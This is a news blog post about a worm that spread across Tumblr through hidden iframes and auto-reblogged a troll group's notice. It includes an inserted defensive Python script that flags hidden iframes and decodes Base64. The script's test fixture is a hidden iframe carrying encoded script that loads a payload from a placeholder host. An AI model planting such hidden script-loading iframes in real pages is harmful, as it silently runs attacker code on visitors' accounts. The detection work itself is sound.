Worm. Such a little word, but it belies a lot of grief, particularly for Tumblr, which saw several of its sites blighted when a worm spread like lightning on Monday.

The digital vandalism showed up as a headshot photo beside some… erm… provocative text branded with the logo from GNAA. Short for the Gay N***** Association of America, the GNAA is a particularly vocal group of Internet trolls that takes aim at bloggers with racist posts.

Caution: Foul language ahead. Put the little ones in the next room, should you decide to scroll down. 

SophosLabs did a sweep of the incident and figured out how the worm spread so quickly.

Tumblr has a reblogging feature that kicked in whenever someone (who was already logged in) visited an infected page. Those who hadn’t signed in simply got directed to a login page, while everyone else had the GNAA notice reblogged on their own Tumblr — including sites like The Verge. Explains Sophos:

The Base64 string was actually encoded JavaScript, hidden inside an iframe that was invisible to the naked eye, that dragged content from a URL. Once decoded, the intention of the code becomes more clear.
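To make the mechanism Sophos describes concrete from the defender's side, here is an added example (not code from Sophos, Tumblr, or the original article) that audits a page for the two tell-tale traits: iframes styled so nobody would see them, and long Base64 runs in the frame's source that decode to script content pulling from some external URL. The sample HTML, the placeholder domains and the hiding heuristics are all constructed for this illustration and are assumptions, not the actual worm's markup.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Constructed sample page, not the real Tumblr payload: one visible post, one
# iframe hidden with CSS whose data: URL carries Base64 that decodes to script
# content fetching from a placeholder domain, and one ordinary visible embed.
HIDDEN_PAYLOAD = base64.b64encode(
    b'<script src="http://payload.example.invalid/worm.js"></script>'
).decode("ascii")

SAMPLE_HTML = f"""
<html><body>
<p>Just a normal post about cats.</p>
<iframe style="display:none;width:0;height:0"
        src="data:text/html;base64,{HIDDEN_PAYLOAD}"></iframe>
<iframe width="300" height="200"
        src="https://video.example.invalid/embed/1"></iframe>
</body></html>
"""

BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL_PATTERN = re.compile(r"https?://[^\s\"'<>]+")
SCRIPT_MARKERS = ("<script", "javascript:", "eval(", "document.write")


def is_hidden(attrs):
    """True if the iframe is styled or sized so a reader would never see it (heuristic)."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    if re.search(r"(width|height):0(px)?(;|$)", style):
        return True
    return attrs.get("width", "").strip() == "0" or attrs.get("height", "").strip() == "0"


def decode_base64_runs(text):
    """Decode every long Base64-looking run in text; skip runs that are not valid Base64."""
    decoded = []
    for run in BASE64_RUN.findall(text):
        try:
            raw = base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


class IframeAuditor(HTMLParser):
    """Collects one record per <iframe>: hidden?, decoded script?, referenced URLs."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        attrs = {k.lower(): (v or "") for k, v in attrs}
        decoded = decode_base64_runs(attrs.get("src", ""))
        script_like = any(m in d.lower() for d in decoded for m in SCRIPT_MARKERS)
        urls = URL_PATTERN.findall(" ".join(decoded))
        hidden = is_hidden(attrs)
        self.findings.append({
            "src": attrs.get("src", "")[:40],
            "hidden": hidden,
            "decoded_script": script_like,
            "urls": urls,
            "suspicious": hidden or script_like,
        })


def audit_html(html):
    """Return one finding per iframe in the page, flagging hidden or script-carrying frames."""
    auditor = IframeAuditor()
    auditor.feed(html)
    return auditor.findings


if __name__ == "__main__":
    for finding in audit_html(SAMPLE_HTML):
        print(finding)
```

Run against the constructed page, the first iframe is flagged on both counts (hidden styling and a decoded `<script>` fetching from the placeholder domain) while the plain video embed is not. In a real deployment the decoded URLs are the thing to feed into a blocklist or a content-filter rule, which is the same lever Sophos describes pulling in the next paragraph.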

For now, it seems Sophos got a handle on things by blocking access to the strangled.net URL. For more “geekinese” on how the malicious JavaScript worked and how it got past Tumblr, visit the source link.

Have you seen the GNAA notice, or had the worm affect your Tumblr account? Let us know in the comments.

[Via Sophos’ Naked Security blog]